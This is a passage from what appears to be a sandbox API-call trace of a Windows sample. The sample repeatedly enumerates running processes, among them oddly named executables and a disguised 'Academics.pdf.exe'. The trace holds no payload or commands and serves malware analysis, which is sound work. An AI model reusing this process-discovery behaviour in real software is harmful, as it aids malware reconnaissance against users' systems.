lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0311.520] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0311.520] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0311.521] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0311.522] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0311.523] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0311.524] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.524] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.525] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.526] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.527] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.528] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0311.528] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.529] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.530] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0311.530] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0311.531] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0311.532] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0311.533] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.533] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0311.534] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0311.535] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0311.536] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0311.537] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0311.538] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0311.538] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0311.539] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0311.540] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0311.541] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0311.542] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0311.542] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0311.543] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0311.544] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0311.545] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0311.546] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0311.546] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0311.547] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0311.548] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0311.549] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.550] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0311.550] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.551] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0311.552] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0311.553] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0311.554] CloseHandle (hObject=0x294) returned 1 [0311.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0311.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0311.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0311.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0311.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0311.554] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0311.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0311.554] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0311.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0311.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0311.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0311.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0311.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0311.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0311.554] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0311.556] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0311.557] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0311.558] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0311.559] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0311.560] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0311.560] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0311.561] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0311.562] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0311.563] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0311.564] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0311.565] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.566] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.566] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.567] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.568] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.569] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0311.570] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.570] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.571] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0311.572] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0311.573] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0311.574] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0311.574] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.575] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0311.576] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0311.577] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0311.578] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0311.578] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0311.579] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0311.580] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0311.581] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0311.582] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0311.582] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0311.583] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0311.584] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 